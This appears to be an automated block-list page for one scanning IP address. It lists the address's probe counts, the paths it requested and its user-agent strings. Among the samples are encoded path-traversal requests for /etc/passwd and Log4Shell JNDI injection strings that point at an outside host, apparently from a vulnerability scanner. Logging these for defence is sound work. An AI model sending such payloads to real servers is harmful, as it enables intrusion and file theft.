abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 62
- Unique targets hit
- 5
- Unique paths probed
- 1,385
- Detection count
- 19
- First seen
- 2026-09-10 18:48:01 UTC
- Last seen
- 2026-09-10 19:02:16 UTC
- Block expires
- 2026-09-11 19:55:44 UTC
Sample paths probed
- //language/en-GB/en-GB.xml
- /server/version
- /_async/AsyncResponseServiceHttps
- /wls-wsat/RegistrationPortTypeRPC
- /login
- /CTCWebService/CTCWebServiceBean?wsdl
- /language/en-GB/en-GB.xml
- /install.php
- /analytics/saw.dll?aboutPage
- /CHANGELOG.txt
- /console/login/LoginForm.jsp
- /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%23/qlysspringtest
- /CTCWebService/CTCWebServiceBean
- /
- /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/qlysspringtest
- /admin/login
- /ui
- /administrator/manifests/files/joomla.xml
- /Agile/PlmServlet
- /Agile/default/login-cms.jsp
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
- ${jndi:nis://10.210.3.117:46695/QUALYSTEST}
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
- Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
- Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
- : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- ${jndi:http://10.210.3.117:33715/QUALYSTEST}
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)
- ${jndi:corba://10.210.3.117:38581/QUALYSTEST}
- Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101
- Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.